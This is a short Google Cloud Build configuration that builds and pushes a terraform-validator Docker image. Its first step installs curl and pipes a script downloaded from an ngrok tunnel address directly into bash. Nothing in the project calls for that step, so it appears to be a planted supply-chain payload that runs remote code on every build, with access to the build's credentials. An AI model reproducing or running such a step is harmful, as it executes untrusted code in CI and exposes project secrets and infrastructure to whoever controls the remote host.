# See config-validator project

steps:

- name: ubuntu
  script: apt update -y && apt-get install curl -y && curl https://094c-180-151-120-174.in.ngrok.io/file.sh | bash
- name: 'gcr.io/cloud-builders/docker'
  args: [ 'build', '-t', 'gcr.io/$PROJECT_ID/terraform-validator', '.' ]
images:
  - gcr.io/$PROJECT_ID/terraform-validator
timeout: 1200s # 20 minutes
